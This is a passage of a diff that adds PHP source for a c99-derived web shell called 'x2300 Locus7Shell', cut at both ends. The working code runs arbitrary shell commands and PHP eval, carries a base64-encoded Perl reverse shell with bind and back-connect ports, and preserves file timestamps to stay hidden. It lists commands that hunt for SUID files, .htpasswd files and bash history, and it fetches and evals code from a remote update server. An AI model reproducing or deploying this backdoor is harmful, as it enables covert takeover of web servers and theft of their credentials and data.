+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server 
+$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>x2300 Locus7Shell Modified by #!physx^ </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), 
+  array("list file attributes on a Linux second extended file system", "lsattr -va"), 
+  array("show opened ports", "netstat -an | grep -i listen") 
+ ); 
+} 
+else 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "dir"), 
+  array("show opened ports", "netstat -an") 
+ ); 
+} 
+
+$sess_cookie = "c99shvars"; // Cookie-variable name 
+
+$usefsbuff = TRUE; //Buffer-function 
+$copy_unset = FALSE; //Remove copied files from buffer after pasting 
+
+//Quick launch 
+$quicklaunch = array( 
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), 
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), 
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), 
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), 
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), 
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), 
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), 
+ array("<br><center><b>[Enumerate]</b>",$enumerate),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"), 
+ array("<b>[Tools]</b>",$surl."act=tools&d=%d"), 
+ array("<b>[Proc.]</b>",$surl."act=processes&d=%d"), 
+ array("<b>[FTP Brute]</b>",$surl."act=ftpquickbrute&d=%d"), 
+ array("<b>[Sec.]</b>",$surl."act=security&d=%d"), 
+ array("<b>[SQL]</b>",$surl."act=sql&d=%d"), 
+ array("<b>[PHP-Code]</b>",$surl."act=eval&d=%d"), 
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"), 
+ array("<b>[milw0rm it!]</b>",$millink),
+ array("<b>[PHP-Proxy]</b>",$phprox),
+ array("<b>[Self remove]</b></center>",$surl."act=selfremove")
+); 
+
+//Highlight-code colors 
+$highlight_background = "#c0c0c0"; 
+$highlight_bg = "#FFFFFF"; 
+$highlight_comment = "#6A6A6A"; 
+$highlight_default = "#0000BB"; 
+$highlight_html = "#1300FF"; 
+$highlight_keyword = "#007700"; 
+$highlight_string = "#000000"; 
+
+@$f = $_REQUEST["f"]; 
+@extract($_REQUEST["c99shcook"]); 
+
+//END CONFIGURATION 
+
+
+// \/Next code isn't for editing\/ 
+/*function ex($cfe) 
+{ 
+ $res = ''; 
+ if (!empty($cfe)) 
+ { 
+  if(function_exists('exec')) 
+   { 
+    @exec($cfe,$res); 
+    $res = join("\n",$res); 
+   } 
+  elseif(function_exists('shell_exec')) 
+   { 
+    $res = @shell_exec($cfe); 
+   } 
+  elseif(function_exists('system')) 
+   { 
+    @ob_start(); 
+    @system($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(function_exists('passthru')) 
+   { 
+    @ob_start(); 
+    @passthru($cfe); 
+    $res = @ob_get_contents(); 
+    @ob_end_clean(); 
+   } 
+  elseif(@is_resource($f = @popen($cfe,"r"))) 
+  { 
+   $res = ""; 
+   while(!@feof($f)) { $res .= @fread($f,1024); } 
+   @pclose($f); 
+  } 
+ } 
+ return $res; 
+}*/
+/*function which($pr) 
+{ 
+$path = ex("which $pr"); 
+if(!empty($path)) { return $path; } else { return $pr; } 
+} 
+
+function cf($fname,$text) 
+{ 
+ $w_file=@fopen($fname,"w") or err(0); 
+ if($w_file) 
+ { 
+ @fputs($w_file,@base64_decode($text)); 
+ @fclose($w_file); 
+ } 
+}*/ 
+/*function err($n,$txt='') 
+{ 
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#000000><font color=red face=Verdana size=-2><div align=center><b>';     
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; 
+if(!empty($txt)) { echo " $txt"; } 
+echo '</b></div></font></td></tr></table>'; 
+return null; 
+}*/
+@set_time_limit(0); 
+$tmp = array(); 
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} 
+$s = "!^(".implode("|",$tmp).")$!i"; 
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://locus7s.com/\">x2300 Shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} 
+if (!empty($login)) 
+{ 
+ if (empty($md5_pass)) {$md5_pass = md5($pass);} 
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) 
+ { 
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));} 
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); 
+  header("HTTP/1.0 401 Unauthorized"); 
+  exit($accessdeniedmess); 
+ } 
+} 
+if ($act != "img") 
+{ 
+$lastdir = realpath("."); 
+chdir($curdir); 
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} 
+$sess_data = unserialize($_COOKIE["$sess_cookie"]); 
+if (!is_array($sess_data)) {$sess_data = array();} 
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} 
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} 
+
+$disablefunc = @ini_get("disable_functions"); 
+if (!empty($disablefunc)) 
+{ 
+ $disablefunc = str_replace(" ","",$disablefunc); 
+ $disablefunc = explode(",",$disablefunc); 
+} 
+
+if (!function_exists("c99_buff_prepare")) 
+{ 
+function c99_buff_prepare() 
+{ 
+ global $sess_data; 
+ global $act; 
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} 
+ $sess_data["copy"] = array_unique($sess_data["copy"]); 
+ $sess_data["cut"] = array_unique($sess_data["cut"]); 
+ sort($sess_data["copy"]); 
+ sort($sess_data["cut"]); 
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} 
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} 
+} 
+} 
+c99_buff_prepare(); 
+
+if (!function_exists("c99_sess_put")) 
+{ 
+function c99_sess_put($data) 
+{ 
+ global $sess_cookie; 
+ global $sess_data; 
+ c99_buff_prepare(); 
+ $sess_data = $data; 
+ $data = serialize($data); 
+ setcookie($sess_cookie,$data); 
+} 
+} 
+foreach (array("sort","sql_sort") as $v) 
+{ 
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];} 
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];} 
+} 
+if ($sort_save) 
+{ 
+ if (!empty($sort)) {setcookie("sort",$sort);} 
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} 
+} 
+if (!function_exists("str2mini")) 
+{ 
+function str2mini($content,$len) 
+{ 
+ if (strlen($content) > $len) 
+ { 
+  $len = ceil($len/2) - 2; 
+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o)) 
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink($o);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver." 
+# Home page: http://www.Locus7s.com 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
